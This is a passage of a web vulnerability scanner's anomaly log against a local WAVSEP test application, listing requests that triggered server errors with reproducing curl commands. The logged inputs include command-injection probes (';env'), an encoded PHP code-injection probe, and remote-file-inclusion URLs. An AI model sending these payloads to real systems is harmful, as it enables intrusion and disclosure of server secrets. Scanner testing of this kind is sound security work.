Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case05-InjectionInSearchOrderBy-String-BinaryDeliberateRuntimeError-WithErrors.jsp
Content-Type: application/x-www-form-urlencoded

orderby=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case05-InjectionInSearchOrderBy-String-BinaryDeliberateRuntimeError-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case05-InjectionInSearchOrderBy-String-BinaryDeliberateRuntimeError-WithErrors.jsp" -d "orderby=%3Benv"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case06-InjectionInView-Numeric-PermissionBypass-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter transactionId
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case06-InjectionInView-Numeric-PermissionBypass-WithErrors.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case06-InjectionInView-Numeric-PermissionBypass-WithErrors.jsp
Content-Type: application/x-www-form-urlencoded

transactionId=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case06-InjectionInView-Numeric-PermissionBypass-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case06-InjectionInView-Numeric-PermissionBypass-WithErrors.jsp" -d "transactionId=%3Benv"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case07-InjectionInSearch-Numeric-UnionExploit-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter msgId
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case07-InjectionInSearch-Numeric-UnionExploit-WithErrors.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case07-InjectionInSearch-Numeric-UnionExploit-WithErrors.jsp
Content-Type: application/x-www-form-urlencoded

msgId=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case07-InjectionInSearch-Numeric-UnionExploit-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case07-InjectionInSearch-Numeric-UnionExploit-WithErrors.jsp" -d "msgId=%3Benv"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case08-InjectionInCalc-Numeric-BooleanExploit-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter minBalanace
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case08-InjectionInCalc-Numeric-BooleanExploit-WithErrors.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case08-InjectionInCalc-Numeric-BooleanExploit-WithErrors.jsp
Content-Type: application/x-www-form-urlencoded

minBalanace=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case08-InjectionInCalc-Numeric-BooleanExploit-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case08-InjectionInCalc-Numeric-BooleanExploit-WithErrors.jsp" -d "minBalanace=%3Benv"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case09-InjectionInUpdate-Numeric-CommandInjection-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter msgid
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case09-InjectionInUpdate-Numeric-CommandInjection-WithErrors.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case09-InjectionInUpdate-Numeric-CommandInjection-WithErrors.jsp
Content-Type: application/x-www-form-urlencoded

msgid=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case09-InjectionInUpdate-Numeric-CommandInjection-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case09-InjectionInUpdate-Numeric-CommandInjection-WithErrors.jsp" -d "msgid=%3Benv"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case10-InjectionInSearchOrderBy-Numeric-BinaryDeliberateRuntimeError-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter orderby
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case10-InjectionInSearchOrderBy-Numeric-BinaryDeliberateRuntimeError-WithErrors.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case10-InjectionInSearchOrderBy-Numeric-BinaryDeliberateRuntimeError-WithErrors.jsp
Content-Type: application/x-www-form-urlencoded

orderby=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case10-InjectionInSearchOrderBy-Numeric-BinaryDeliberateRuntimeError-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case10-InjectionInSearchOrderBy-Numeric-BinaryDeliberateRuntimeError-WithErrors.jsp" -d "orderby=%3Benv"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case11-InjectionInView-Date-PermissionBypass-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter transactionDate
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case11-InjectionInView-Date-PermissionBypass-WithErrors.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case11-InjectionInView-Date-PermissionBypass-WithErrors.jsp
Content-Type: application/x-www-form-urlencoded

transactionDate=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case11-InjectionInView-Date-PermissionBypass-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case11-InjectionInView-Date-PermissionBypass-WithErrors.jsp" -d "transactionDate=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case12-InjectionInSearch-Date-UnionExploit-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter transactionDate
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case12-InjectionInSearch-Date-UnionExploit-WithErrors.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case12-InjectionInSearch-Date-UnionExploit-WithErrors.jsp
Content-Type: application/x-www-form-urlencoded

transactionDate=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case12-InjectionInSearch-Date-UnionExploit-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case12-InjectionInSearch-Date-UnionExploit-WithErrors.jsp" -d "transactionDate=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case13-InjectionInCalc-Date-BooleanExploit-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter transactionDate
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case13-InjectionInCalc-Date-BooleanExploit-WithErrors.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case13-InjectionInCalc-Date-BooleanExploit-WithErrors.jsp
Content-Type: application/x-www-form-urlencoded

transactionDate=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case13-InjectionInCalc-Date-BooleanExploit-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case13-InjectionInCalc-Date-BooleanExploit-WithErrors.jsp" -d "transactionDate=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case14-InjectionInUpdate-Date-CommandInjection-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter transactionDate
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case14-InjectionInUpdate-Date-CommandInjection-WithErrors.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case14-InjectionInUpdate-Date-CommandInjection-WithErrors.jsp
Content-Type: application/x-www-form-urlencoded

transactionDate=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case14-InjectionInUpdate-Date-CommandInjection-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case14-InjectionInUpdate-Date-CommandInjection-WithErrors.jsp" -d "transactionDate=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case15-InjectionInSearch-DateWithoutQuotes-UnionExploit-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter transactionDate
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case15-InjectionInSearch-DateWithoutQuotes-UnionExploit-WithErrors.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case15-InjectionInSearch-DateWithoutQuotes-UnionExploit-WithErrors.jsp
Content-Type: application/x-www-form-urlencoded

transactionDate=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case15-InjectionInSearch-DateWithoutQuotes-UnionExploit-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case15-InjectionInSearch-DateWithoutQuotes-UnionExploit-WithErrors.jsp" -d "transactionDate=%3Benv"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case16-InjectionInView-NumericWithoutQuotes-PermissionBypass-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter transactionId
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case16-InjectionInView-NumericWithoutQuotes-PermissionBypass-WithErrors.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case16-InjectionInView-NumericWithoutQuotes-PermissionBypass-WithErrors.jsp
Content-Type: application/x-www-form-urlencoded

transactionId=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case16-InjectionInView-NumericWithoutQuotes-PermissionBypass-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case16-InjectionInView-NumericWithoutQuotes-PermissionBypass-WithErrors.jsp" -d "transactionId=%3Benv"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case17-InjectionInSearch-NumericWithoutQuotes-UnionExploit-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter msgId
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case17-InjectionInSearch-NumericWithoutQuotes-UnionExploit-WithErrors.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case17-InjectionInSearch-NumericWithoutQuotes-UnionExploit-WithErrors.jsp
Content-Type: application/x-www-form-urlencoded

msgId=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case17-InjectionInSearch-NumericWithoutQuotes-UnionExploit-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case17-InjectionInSearch-NumericWithoutQuotes-UnionExploit-WithErrors.jsp" -d "msgId=%3Benv"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case18-InjectionInCalc-NumericWithoutQuotes-BooleanExploit-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter minBalanace
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case18-InjectionInCalc-NumericWithoutQuotes-BooleanExploit-WithErrors.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case18-InjectionInCalc-NumericWithoutQuotes-BooleanExploit-WithErrors.jsp
Content-Type: application/x-www-form-urlencoded

minBalanace=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case18-InjectionInCalc-NumericWithoutQuotes-BooleanExploit-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case18-InjectionInCalc-NumericWithoutQuotes-BooleanExploit-WithErrors.jsp" -d "minBalanace=%3Benv"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case19-InjectionInUpdate-NumericWithoutQuotes-CommandInjection-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter msgid
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case19-InjectionInUpdate-NumericWithoutQuotes-CommandInjection-WithErrors.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case19-InjectionInUpdate-NumericWithoutQuotes-CommandInjection-WithErrors.jsp
Content-Type: application/x-www-form-urlencoded

msgid=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case19-InjectionInUpdate-NumericWithoutQuotes-CommandInjection-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case19-InjectionInUpdate-NumericWithoutQuotes-CommandInjection-WithErrors.jsp" -d "msgid=%3Benv"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case01-FalsePositiveInjectionInLogin-PsAndIv-500ErrorOnIvFailure.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter username
POST /wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case01-FalsePositiveInjectionInLogin-PsAndIv-500ErrorOnIvFailure.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case01-FalsePositiveInjectionInLogin-PsAndIv-500ErrorOnIvFailure.jsp
Content-Type: application/x-www-form-urlencoded

username=%3Benv&password=letmein
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case01-FalsePositiveInjectionInLogin-PsAndIv-500ErrorOnIvFailure.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case01-FalsePositiveInjectionInLogin-PsAndIv-500ErrorOnIvFailure.jsp" -d "username=%3Benv&password=letmein"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case02-FalsePositiveInjectionInLogin-PsAndIv-500SyntaxErrorOnIvFailure.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter username
POST /wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case02-FalsePositiveInjectionInLogin-PsAndIv-500SyntaxErrorOnIvFailure.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case02-FalsePositiveInjectionInLogin-PsAndIv-500SyntaxErrorOnIvFailure.jsp
Content-Type: application/x-www-form-urlencoded

username=%3Benv&password=letmein
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case02-FalsePositiveInjectionInLogin-PsAndIv-500SyntaxErrorOnIvFailure.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case02-FalsePositiveInjectionInLogin-PsAndIv-500SyntaxErrorOnIvFailure.jsp" -d "username=%3Benv&password=letmein"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case06-FalsePositiveInjectionInLogin-HoneyPotNoSQL-Fake500SyntaxErrorOnIvFailure.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter username
POST /wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case06-FalsePositiveInjectionInLogin-HoneyPotNoSQL-Fake500SyntaxErrorOnIvFailure.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case06-FalsePositiveInjectionInLogin-HoneyPotNoSQL-Fake500SyntaxErrorOnIvFailure.jsp
Content-Type: application/x-www-form-urlencoded

username=%3Benv&password=letmein
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case06-FalsePositiveInjectionInLogin-HoneyPotNoSQL-Fake500SyntaxErrorOnIvFailure.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case06-FalsePositiveInjectionInLogin-HoneyPotNoSQL-Fake500SyntaxErrorOnIvFailure.jsp" -d "username=%3Benv&password=letmein"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case07-FalsePositiveInjectionInLogin-PsAndIv-500ErrorOnUnrelatedSyntaxError.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter username
POST /wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case07-FalsePositiveInjectionInLogin-PsAndIv-500ErrorOnUnrelatedSyntaxError.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case07-FalsePositiveInjectionInLogin-PsAndIv-500ErrorOnUnrelatedSyntaxError.jsp
Content-Type: application/x-www-form-urlencoded

username=%3Benv&password=letmein
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case07-FalsePositiveInjectionInLogin-PsAndIv-500ErrorOnUnrelatedSyntaxError.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case07-FalsePositiveInjectionInLogin-PsAndIv-500ErrorOnUnrelatedSyntaxError.jsp" -d "username=%3Benv&password=letmein"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case25-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case25-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case25-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case26-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case26-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case26-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case27-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case27-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
